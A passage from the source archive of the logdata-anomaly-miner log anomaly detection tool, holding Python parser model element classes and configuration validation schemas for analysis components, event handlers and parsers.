"optional_element has to be of the type ModelElementInterface." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "repeated_element") and not isinstance(self.repeated_element, ModelElementInterface): msg = "repeated_element has to be of the type ModelElementInterface." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "min_repeat"): if not isinstance(self.min_repeat, int) or isinstance(self.min_repeat, bool): msg = "min_repeat has to be of the type integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.min_repeat < 0: msg = "min_repeat has to be >= 0." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "max_repeat"): if not isinstance(self.max_repeat, int) or isinstance(self.max_repeat, bool): msg = "max_repeat has to be of the type integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.max_repeat < 1 or self.min_repeat > self.max_repeat: msg = "max_repeat has to be >= 1 and max_repeat has to be bigger than min_repeat." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "alphabet"): if not isinstance(self.alphabet, bytes): msg = "alphabet has to be of the type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.alphabet) < 1: msg = "alphabet must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "strict_mode") and not isinstance(self.strict_mode, bool): msg = "strict_mode has to be of the type bool." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "ignore_null") and not isinstance(self.ignore_null, bool): msg = "ignore_null has to be of the type bool." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) @abc.abstractmethod def get_match_element(self, path, match_context): """ Try to find a match on given data for this model element and all its children. When a match is found, the matchContext is updated accordingly. @param path the model path to the parent model element invoking this method. @param match_context an instance of MatchContext class holding the data context to match against. @return the match_element or None if model did not match. """ OptionalMatchModelElement.py000066400000000000000000000044211437606560100362030ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing""" This module defines a model element that is optional. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface class OptionalMatchModelElement(ModelElementInterface): """ This class defines a model element tries to match against a given model element. If that fails returns a zero length match anyway. """ def __init__(self, element_id: str, optional_element: ModelElementInterface): """ Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param optional_element the element to be optionally matched. """ super().__init__(element_id, optional_element=optional_element) self.empty_match_element = MatchElement(f"None/{self.element_id}", b"", None, None) def get_id(self): """Get the element ID.""" return self.element_id def get_child_elements(self): """Return all optional elements.""" return [self.optional_element] def get_match_element(self, path: str, match_context): """@return the embedded child match or an empty match.""" current_path = f"{path}/{self.element_id}" start_data = match_context.match_data match = self.optional_element.get_match_element(current_path, match_context) if match is None: self.empty_match_element.path = current_path return self.empty_match_element return MatchElement(current_path, start_data[:len(start_data) - len(match_context.match_data)], start_data[:len(start_data) - len(match_context.match_data)], [match]) logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing/ParserMatch.py000066400000000000000000000064161437606560100334440ustar00rootroot00000000000000""" This module defines a matching parser model element. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.parsing.MatchElement import MatchElement from collections import deque class ParserMatch: """ Objects of this class store information about a complete model match. Unlike the MatchElement, this class also provides fields to store information commonly used when dealing with the match. """ def __init__(self, match_element: MatchElement): """ Initialize the match. @param match_element the root MatchElement from the parsing process. """ if not isinstance(match_element, MatchElement): msg = "match_element has to be of the type MatchElement." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.match_element = match_element self.match_dictionary = None def get_match_element(self): """Return the matching element.""" return self.match_element def get_match_dictionary(self): """Return a dictionary of all children matches.""" if self.match_dictionary is not None: return self.match_dictionary stack = deque() stack.append([self.match_element]) result_dict = {} while stack: match_list = stack.pop() counter_dict = {} for test_match in match_list: if test_match.path in counter_dict.keys(): # skipcq: PYL-C0201 counter_dict[test_match.path] = 0 result_dict[test_match.path] = [] else: counter_dict[test_match.path] = None for test_match in match_list: path = test_match.path if counter_dict[path] is not None: try: pos = next(i for i, x in enumerate(result_dict[test_match.path]) if not isinstance(x, list) and isinstance( test_match.match_object, type(x.match_object)) and test_match.match_object == x.match_object) path += f"/{pos}" except StopIteration: path += "/%d" % counter_dict[path] counter_dict[test_match.path] += 1 result_dict[test_match.path].append(test_match) result_dict[path] = test_match children = test_match.children if children is not None: stack.append(children) self.match_dictionary = result_dict return result_dict def __str__(self): return f'ParserMatch: {self.match_element.annotate_match(" ")}' RepeatedElementDataModelElement.py000066400000000000000000000046661437606560100373110ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a model element that repeats a number of times. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface class RepeatedElementDataModelElement(ModelElementInterface): """Objects of this class match on repeats of a given element.""" def __init__(self, element_id: str, repeated_element: ModelElementInterface, min_repeat: int = 1, max_repeat: int = 0x100000): """ Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param repeated_element the MatchElement to be repeated in the data. @param min_repeat the minimum number of repeated matches of the repeated_element. @param max_repeat the maximum number of repeated matches of the repeated_element. """ super().__init__(element_id, repeated_element=repeated_element, min_repeat=min_repeat, max_repeat=max_repeat) def get_match_element(self, path, match_context): """Find a suitable number of repeats.""" current_path = f"{path}/{self.element_id}" start_data = match_context.match_data matches = [] match_count = 0 while match_count != self.max_repeat + 1: child_match = self.repeated_element.get_match_element(f"{current_path}/{match_count}", match_context) if child_match is None: break matches += [child_match] match_count += 1 if match_count < self.min_repeat or match_count > self.max_repeat: match_context.match_data = start_data return None return MatchElement(current_path, start_data[:len(start_data) - len(match_context.match_data)], start_data[:len(start_data) - len(match_context.match_data)], matches) SequenceModelElement.py000066400000000000000000000047051437606560100352160ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing""" This module defines a model element that consists of a sequence of model elements that all have to match. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from typing import List from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface class SequenceModelElement(ModelElementInterface): """This class defines an element to find matches that comprise matches of all given child model elements.""" def __init__(self, element_id: str, children: List["ModelElementInterface"]): """ Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param children a list of child elements to be iterated through. """ super().__init__(element_id, children=children) def get_match_element(self, path, match_context): """ Try to find a match on given data for this model element and all its children. When a match is found, the matchContext is updated accordingly. @param path the model path to the parent model element invoking this method. @param match_context an instance of MatchContext class holding the data context to match against. @return the matchElement or None if model did not match. """ current_path = f"{path}/{self.element_id}" start_data = match_context.match_data matches = [] for child_element in self.children: child_match = child_element.get_match_element(current_path, match_context) if child_match is None: match_context.match_data = start_data return None matches += [child_match] return MatchElement(current_path, start_data[:len(start_data) - len(match_context.match_data)], start_data[:len(start_data) - len(match_context.match_data)], matches) VariableByteDataModelElement.py000066400000000000000000000036271437606560100366130ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing""" This module defines a model element for a variable amount of bytes. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface class VariableByteDataModelElement(ModelElementInterface): """This class defines a model element that takes any string that only contains characters of a given alphabet.""" def __init__(self, element_id: str, alphabet: bytes): """ Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param alphabet the allowed letters to match data. """ super().__init__(element_id, alphabet=alphabet) def get_match_element(self, path, match_context): """ Find the maximum number of bytes matching the given alphabet. @return a match when at least one byte was found within alphabet. """ data = match_context.match_data match_len = 0 for test_byte in data: if test_byte not in self.alphabet: break match_len += 1 if match_len == 0: return None match_data = data[:match_len] match_context.update(match_data) return MatchElement(f"{path}/{self.element_id}", match_data, match_data, None) WhiteSpaceLimitedDataModelElement.py000066400000000000000000000031501437606560100375750ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing""" This module defines a model element that takes any string up to the next white space. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface class WhiteSpaceLimitedDataModelElement(ModelElementInterface): """This class defines a model element that represents a variable amount of characters delimited by a white space.""" def get_match_element(self, path: str, match_context): """ Find the maximum number of bytes before encountering whitespace or end of data. @return a match when at least one byte was found. """ data = match_context.match_data match_len = 0 for test_byte in data: if test_byte in b" \t": break match_len += 1 if match_len == 0: return None match_data = data[:match_len] match_context.update(match_data) return MatchElement(f"{path}/{self.element_id}", match_data, match_data, None) logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/000077500000000000000000000000001437606560100306325ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/BaseSchema.py000066400000000000000000000114021437606560100331750ustar00rootroot00000000000000{ 'LearnMode': { 'required': False, 'type': 'boolean' }, 'AminerUser': { 'required': False, 'type': 'string', 'default': 'aminer', 'empty': False }, 'AminerGroup': { 'required': False, 'type': 'string', 'default': 'aminer', 'empty': False }, 'RemoteControlSocket': { 'required': False, 'type': 'string', 'empty': False }, 'Core.PersistenceDir': { 'required': False, 'type': 'string', 'default': '/var/lib/aminer', 'empty': False }, 'Core.LogDir': { 'required': False, 'type': 'string', 'default': '/var/lib/aminer/log', 'empty': False }, 'Core.PersistencePeriod': { 'required': False, 'type': 'integer', 'default': 600, 'min': 1 }, 'MailAlerting.TargetAddress': { 'required': False, 'type': 'string', 'regex': '(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+.[a-zA-Z0-9-]+$)|^[a-zA-Z0-9]+@localhost$', 'default': 'root@localhost', 'empty': False }, 'MailAlerting.FromAddress': { 'required': False, 'type': 'string', 'regex': '(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+.[a-zA-Z0-9-]+$)|^[a-zA-Z0-9]+@localhost$', 'default': 'root@localhost', 'empty': False }, 'MailAlerting.SubjectPrefix': { 'required': False, 'type': 'string', 'default': 'aminer Alerts:' }, 'MailAlerting.AlertGraceTime': { 'required': False, 'type': 'integer', 'default': 0, 'min': 0 }, 'MailAlerting.EventCollectTime': { 'required': False, 'type': 'integer', 'default': 10, 'min': 0 }, 'MailAlerting.MinAlertGap': { 'required': False, 'type': 'integer', 'default': 600, 'min': 0 }, 'MailAlerting.MaxAlertGap': { 'required': False, 'type': 'integer', 'default': 600, 'min': 0 }, 'MailAlerting.MaxEventsPerMessage': { 'required': False, 'type': 'integer', 'default': 1000, 'min': 0 }, 'LogPrefix': { 'required': False, 'type': 'string', }, 'LogResourceList': { 'required': True, 'type': 'list', 'schema': {'type': 'string', 'regex': '^file://.+|^unix://.+', 'empty': False} }, 'Log.StatisticsPeriod': { 'required': False, 'type': 'integer', 'default': 3600, 'min': 0 }, 'Log.StatisticsLevel': { 'required': False, 'type': 'integer', 'default': 1, 'min': 0, 'max': 2 }, 'Log.DebugLevel': { 'required': False, 'type': 'integer', 'default': 1, 'min': 0, 'max': 2 }, 'Log.RemoteControlLogFile': { 'required': False, 'type': 'string', 'empty': False }, 'Log.StatisticsFile': { 'required': False, 'type': 'string', 'empty': False }, 'Log.DebugFile': { 'required': False, 'type': 'string', 'empty': False }, 'Log.Rotation.MaxBytes': { 'required': False, 'type': 'integer', 'default': 104857600, # 100 Megabytes 'min': 1 }, 'Log.Rotation.BackupCount': { 'required': False, 'type': 'integer', 'default': 5, 'min': 1 }, 'Log.Encoding': { 'required': False, 'type': 'string', 'empty': False }, 'Input': { 'required': True, 'type': 'dict', 'schema': { 'multi_source': {'type': 'boolean', 'required': False, 'default': False}, 'timestamp_paths': {'type': ['string', 'list'], 'empty': False}, 'adjust_timestamps': {'type': 'boolean', 'required': False, 'default': False}, 'sync_wait_time': {'type': 'integer', 'min': 1, 'default': 5}, 'eol_sep': {'type': 'string', 'required': False, 'default': '\n', 'empty': False}, 'json_format': {'type': 'boolean', 'required': False, 'default': False} } } } logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/000077500000000000000000000000001437606560100335115ustar00rootroot00000000000000AnalysisNormalisationSchema.py000066400000000000000000000376731437606560100414700ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation{ 'Analysis': { 'required': False, 'type': 'list', 'nullable': True, 'schema': { 'type': 'dict', 'schema': { 'id': {'type': 'string', 'nullable': True, 'default': None}, 'type': {'type': 'analysistype', 'coerce': 'toanalysistype', 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'labels': {'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'persistence_id': {'type': 'string', 'default': 'Default'}, 'output_logline': {'type': 'boolean', 'default': False}, 'learn_mode': {'type': 'boolean'}, 'num_windows': {'type': 'integer', 'required': True, 'default': 50}, 'min_anomaly_score': {'type': 'float', 'required': False, 'default': 1.1}, 'min_variance': {'type': 'float', 'required': False, 'default': 0.98}, 'allow_missing_values': {'type': 'boolean', 'default': False}, 'check_interval': {'type': 'integer', 'default': 3600}, 'realert_interval': {'type': 'integer', 'default': 36000}, 'report_interval': {'type': 'integer', 'default': 10}, 'reset_after_report_flag': {'type': 'boolean', 'default': False}, 'path': {'type': 'string', 'nullable': True, 'default': 'Default'}, 'parallel_check_count': {'type': 'integer', 'required': True, 'default': 10}, 'record_count_before_event': {'type': 'integer', 'default': 1000}, 'use_path_match': {'type': 'boolean', 'default': True}, 'use_value_match': {'type': 'boolean', 'default': True}, 'min_rule_attributes': {'type': 'integer', 'default': 1}, 'max_rule_attributes': {'type': 'integer', 'default': 5}, 'max_hypotheses': {'type': 'integer', 'default': 1000}, 'hypothesis_max_delta_time': {'type': 'float', 'default': 5.0}, 'generation_probability': {'type': 'float', 'default': 1.0}, 'generation_factor': {'type': 'float', 'default': 1.0}, 'max_observations': {'type': 'integer', 'default': 500}, 'p0': {'type': 'float', 'default': 0.9}, 'alpha': {'type': 'float', 'default': 0.05}, 'candidates_size': {'type': 'integer', 'default': 10}, 'hypotheses_eval_delta_time': {'type': 'float', 'default': 120.0}, 'delta_time_to_discard_hypothesis': {'type': 'float', 'default': 180.0}, 'check_rules_flag': {'type': 'boolean', 'default': True}, 'constraint_list': { 'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'ignore_list': { 'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'id_path_list': {'type': 'list', 'default': []}, 'scoring_path_list': { 'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'unique_path_list': { 'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'prob_thresh': {'type': 'float', 'default': 0.05}, 'default_freqs': {'type': 'boolean', 'default': False}, 'skip_repetitions': {'type': 'boolean', 'default': False}, 'seq_len': {'type': 'integer', 'default': 3}, 'timeout': {'type': ['integer', 'float'], 'default': -1}, 'allow_missing_id': {'type': 'boolean', 'default': False}, 'window_size': {'type': ['integer', 'float'], 'default': 600}, 'confidence_factor': {'type': 'float', 'default': 0.33}, 'min_allowed_time_diff': {'type': 'float', 'default': 5.0}, 'lower_limit': {'type': ['integer', 'float']}, 'upper_limit': {'type': ['integer', 'float']}, 'idf': {'type': 'boolean', 'default': False}, 'norm': {'type': 'boolean', 'default': False}, 'add_normal': {'type': 'boolean', 'default': False}, 'check_empty_windows': {'type': 'boolean', 'default': False}, 'bin_size': {'type': 'integer'}, 'bin_count': {'type': 'integer'}, 'outlier_bins_flag': {'type': 'boolean', 'default': False}, 'modulo_value': {'type': 'integer'}, 'time_unit': {'type': 'integer'}, 'histogram_defs': {'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string'}}}, 'bin_definition': {'type': 'string'}, 'tuple_transformation_function': {'type': 'string', 'allowed': ['demo'], 'nullable': True, 'default': None}, 'value_list': { 'type': 'list', 'schema': {'type': ['boolean', 'float', 'integer', 'string']}, 'nullable': True, 'default': None}, 'timestamp_path': {'type': 'string', 'nullable': True}, 'min_bin_elements': {'type': 'integer'}, 'min_bin_time': {'type': 'integer'}, 'debug_mode': {'type': 'boolean', 'default': False}, # skipcq: PYL-W0511 # TODO check which streams should be allowed 'stream': {'type': 'string', 'allowed': ['sys.stdout', 'sys.stderr']}, 'separator': {'type': 'string'}, 'missing_value_string': {'type': 'string'}, 'subhandler_list': {'type': 'list', 'schema': {'type': 'string'}}, 'stop_when_handled_flag': {'type': 'boolean', 'default': False}, 'delete_components': {'type': 'boolean', 'default': True}, 'event_type': {'type': 'string'}, 'event_message': {'type': 'string'}, 'sub_rules': {'type': 'list', 'schema': {'type': 'string'}}, 'sub_rule': {'type': 'string'}, 'match_action': {'type': 'string', 'nullable': True, 'default': None}, 'rule_lookup_dict': {'type': 'dict'}, 'default_rule': {'type': 'string', 'nullable': True, 'default': None}, 'value': {'type': ['boolean', 'float', 'integer', 'string']}, 'regex': {'type': 'string'}, 'seconds_modulo': {'type': 'integer'}, 'limit_lookup_dict': {'type': 'dict', 'valuesrules': {'type': 'list', 'schema': { 'type': ['integer', 'float'], 'min': 0}}}, 'default_limit': {'type': 'list', 'schema': {'type': 'integer'}, 'nullable': True, 'default': None}, 'rule_id': {'type': 'string'}, 'min_time_delta': {'type': 'integer'}, 'max_time_delta': {'type': 'integer'}, 'artefact_match_parameters': {'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string'}}, 'nullable': True, 'default': None}, 'action_id': {'type': 'string'}, 'artefact_a_rules': {'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'artefact_b_rules': {'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'ruleset': {'type': 'list', 'schema': {'type': 'string'}}, 'exit_on_error_flag': {'type': 'boolean', 'default': False}, 'allowlist_rules': {'type': 'list', 'schema': {'type': 'string'}}, 'parsed_atom_handler_lookup_list': { 'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string', 'nullable': True}}}, 'default_parsed_atom_handler': {'type': 'string', 'nullable': True, 'default': None}, 'parsed_atom_handler_dict': {'type': 'dict', 'schema': {'id': {'type': 'string'}, 'type': {'type': 'string'}}}, 'min_num_vals': {'type': 'integer', 'default': 1000}, 'max_num_vals': {'type': 'integer', 'default': 1500}, 'save_values': {'type': 'boolean', 'default': True}, 'waiting_time': {'type': 'integer', 'default': 300}, 'num_sections_waiting_time': {'type': 'integer', 'default': 10}, 'event_type_detector': {'type': 'string'}, 'used_gof_test': {'type': 'string', 'allowed': ['CM', 'KS'], 'default': 'CM'}, 'gof_alpha': {'type': 'float', 'default': 0.05}, 's_gof_alpha': {'type': 'float', 'default': 0.05}, 's_gof_bt_alpha': {'type': 'float', 'default': 0.05}, 'd_alpha': {'type': 'float', 'default': 0.1}, 'd_bt_alpha': {'type': 'float', 'default': 0.1}, 'range_alpha': {'type': 'float', 'default': 0.05}, 'dw_alpha': {'type': 'float', 'default': 0.05}, 'div_thres': {'type': 'float', 'default': 0.3}, 'sim_thres': {'type': 'float', 'default': 0.1}, 'indicator_thres': {'type': 'float', 'default': 0.4}, 'num_init': {'type': 'integer', 'default': 100}, 'num_update': {'type': 'integer', 'default': 50}, 'num_update_unq': {'type': 'integer', 'default': 200}, 'num_s_gof_values': {'type': 'integer', 'default': 50}, 'num_s_gof_bt': {'type': 'integer', 'default': 30}, 'num_d_bt': {'type': 'integer', 'default': 30}, 'num_pause_discrete': {'type': 'integer', 'default': 5}, 'num_pause_others': {'type': 'integer', 'default': 2}, 'test_gof_int': {'type': 'boolean', 'default': True}, 'num_stop_update': {'type': 'boolean', 'default': False}, 'silence_output_without_confidence': {'type': 'boolean', 'default': False}, 'silence_output_except_indicator': {'type': 'boolean', 'default': True}, 'num_var_type_hist_ref': {'type': 'integer', 'default': 10}, 'num_update_var_type_hist_ref': {'type': 'integer', 'default': 10}, 'num_var_type_considered_ind': {'type': 'integer', 'default': 10}, 'num_stat_stop_update': {'type': 'integer', 'default': 200}, 'num_updates_until_var_reduction': {'type': 'integer', 'default': 20}, 'var_reduction_thres': {'type': 'float', 'default': 0.6}, 'num_skipped_ind_for_weights': {'type': 'integer', 'default': 1}, 'num_ind_for_weights': {'type': 'integer', 'default': 100}, 'used_multinomial_test': {'type': 'string', 'allowed': ['Approx', 'MT', 'Chi'], 'default': 'Chi'}, 'use_empiric_distr': {'type': 'boolean', 'default': True}, 'save_statistics': {'type': 'boolean', 'default': True}, 'split_reports_flag': {'type': 'boolean', 'default': False}, 'disc_div_thres': {'type': 'float', 'default': 0.3}, 'num_steps_create_new_rules': {'type': 'integer', 'default': -1}, 'num_upd_until_validation': {'type': 'integer', 'default': 20}, 'num_end_learning_phase': {'type': 'integer', 'default': -1}, 'check_cor_thres': {'type': 'float', 'default': 0.5}, 'check_cor_prob_thres': {'type': 'float', 'default': 1.0}, 'check_cor_num_thres': {'type': 'integer', 'default': 10}, 'min_values_cors_thres': {'type': 'integer', 'default': 5}, 'new_vals_alarm_thres': {'type': 'float', 'default': 3.5}, 'num_bt': {'type': 'integer', 'default': 30}, 'alpha_bt': {'type': 'float', 'default': 0.1}, 'used_homogeneity_test': {'type': 'string', 'allowed': ['Chi', 'MaxDist'], 'default': 'Chi'}, 'used_range_test': {'type': 'string', 'allowed': ['MeanSD', 'EmpiricQuantiles', 'MinMax'], 'default': 'MinMax'}, 'range_threshold': {'type': 'float', 'default': 1}, 'range_limits_factor': {'type': 'float', 'default': 1}, 'num_reinit_range': {'type': 'integer', 'default': 100}, 'alpha_chisquare_test': {'type': 'float', 'default': 0.05}, 'max_dist_rule_distr': {'type': 'float', 'default': 0.1}, 'used_presel_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': [ 'matchDiscDistr', 'excludeDueDistr', 'matchDiscVals', 'random']}, 'nullable': True, 'default': None}, 'intersect_presel_meth': {'type': 'boolean', 'default': False}, 'percentage_random_cors': {'type': 'float', 'default': 0.20}, 'match_disc_vals_sim_tresh': {'type': 'float', 'default': 0.7}, 'exclude_due_distr_lower_limit': {'type': 'float', 'default': 0.4}, 'match_disc_distr_threshold': {'type': 'float', 'default': 0.5}, 'used_cor_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': ['Rel', 'WRel']}, 'nullable': True, 'default': None}, 'used_validate_cor_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': [ 'coverVals', 'distinctDistr']}, 'nullable': True, 'default': None}, 'validate_cor_cover_vals_thres': {'type': 'float', 'default': 0.7}, 'validate_cor_distinct_thres': {'type': 'float', 'default': 0.05}, 'time_period_length': {'type': 'integer', 'min': 1, 'required': True, 'default': 86400}, 'max_time_diff': {'type': 'integer', 'min': 1, 'required': True, 'default': 360}, 'num_reduce_time_list': {'type': 'integer', 'min': 1, 'required': True, 'default': 10}, 'output_event_handlers': {'type': 'list', 'nullable': True, 'default': None}, 'suppress': {'type': 'boolean', 'default': False}, 'build_sum_over_values': {'type': 'boolean', 'default': False}, 'num_division_time_step': {'type': 'integer', 'default': 10}, 'num_min_time_history': {'type': 'integer', 'default': 20}, 'num_max_time_history': {'type': 'integer', 'default': 30}, 'num_results_bt': {'type': 'integer', 'default': 15}, 'round_time_interval_threshold': {'type': 'float', 'default': 0.02}, 'acf_threshold': {'type': 'float', 'default': 0.2}, 'acf_pause_interval_percentage': {'type': 'float', 'default': 0.2}, 'acf_auto_pause_interval': {'type': 'boolean', 'default': True}, 'acf_auto_pause_interval_num_min': {'type': 'integer', 'min': 1, 'required': True, 'default': 10}, 'num_log_lines_solidify_matrix': {'type': 'integer', 'default': 10000}, 'time_output_threshold': {'type': 'integer', 'default': 0}, 'anomaly_threshold': {'type': 'float', 'default': 0.05}, 'num_periods_tsa_ini': {'type': 'integer', 'default': 20}, 'allowed_id_tuples': {'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string'}}, 'nullable': True, 'default': None}, 'force_period_length': {'type': 'boolean', 'default': False}, 'set_period_length': {'type': 'integer', 'default': 604800}, 'min_log_lines_per_time_step': {'type': 'integer', 'default': 10}, 'empty_window_warnings': {'type': 'boolean', 'default': True}, 'early_exceeding_anomaly_output': {'type': 'boolean', 'default': False}, 'set_lower_limit': {'type': 'integer', 'min': 0, 'nullable': True, 'default': None}, 'set_upper_limit': {'type': 'integer', 'min': 0, 'nullable': True, 'default': None}, 'local_maximum_threshold': {'type': 'float', 'default': 0.2}, 'combine_values': {'type': 'boolean', 'nullable': True, 'default': True}, } } } } EventHandlerNormalisationSchema.py000066400000000000000000000024301437606560100422430ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation{ 'EventHandlers': { 'required': False, 'type': 'list', 'nullable': True, 'default': None, 'schema': { 'type': 'dict', 'schema': { 'id': {'type': 'string', 'required': True}, 'type': {'type': 'eventhandlertype', 'coerce': 'toeventhandlertype', 'required': True}, 'json': {'type': 'boolean', 'default': False}, 'score': {'type': 'boolean', 'default': False}, 'instance_name': {'type': 'string', 'default': 'aminer'}, 'topic': {'type': 'string'}, 'url': {'type': 'string', 'default': 'ipc:///tmp/aminer'}, 'cfgfile': {'type': 'string', 'default': '/etc/aminer/kafka-client.conf'}, 'options': {'type': 'dict', 'schema': {'id': {'type': 'string'}, 'type': {'type': ['string', 'list', 'integer']}}}, 'output_file_path': {'type': 'string'}, 'pretty': {'type': 'boolean', 'default': True}, 'weights': {'type': 'dict', 'nullable': True, 'default': None}, 'auto_weights': {'type': 'boolean', 'default': False}, 'auto_weights_history_length': {'type': 'integer', 'default': 1000, 'min': 1} } } } } ParserNormalisationSchema.py000066400000000000000000000044371437606560100411310ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation{ 'Parser': { 'required': True, 'type': 'list', 'has_start': True, 'schema': { 'type': 'dict', 'schema': { 'id': {'type': 'string', 'required': True}, 'start': {'type': 'boolean'}, 'type': {'type': 'parsermodel', 'coerce': 'toparsermodel', 'required': True}, 'name': {'type': 'string', 'required': True}, 'args': {'type': ['string', 'list'], 'schema': {'type': ['string', 'integer']}, 'nullable': True}, 'branch_model_dict': {'type': 'list', 'schema': {'type': 'dict', 'schema': {'id': { 'type': ['boolean', 'float', 'integer', 'string']}, 'model': {'type': 'string'}}}}, 'date_formats': {'type': 'list', 'schema': {'type': 'dict', 'schema': {'format': {'type': 'list', 'schema': { 'type': 'string', 'nullable': True}}}}}, 'value_sign_type': {'type': 'string', 'allowed': ['none', 'optional', 'mandatory'], 'default': 'none'}, 'value_pad_type': {'type': 'string', 'allowed': ['none', 'zero', 'blank'], 'default': 'none'}, 'exponent_type': {'type': 'string', 'allowed': ['none', 'optional', 'mandatory'], 'default': 'none'}, 'start_year': {'type': 'integer', 'nullable': True, 'default': None}, 'delimiter': {'type': 'string'}, 'escape': {'type': 'string', 'nullable': True, 'default': None}, 'consume_delimiter': {'type': 'boolean', 'default': False}, 'key_parser_dict': {'type': 'dict'}, 'optional_key_prefix': {'type': 'string', 'default': 'optional_key_'}, 'nullable_key_prefix': {'type': 'string', 'default': '+'}, 'strict': {'type': 'boolean', 'default': False}, 'ignore_null': {'type': 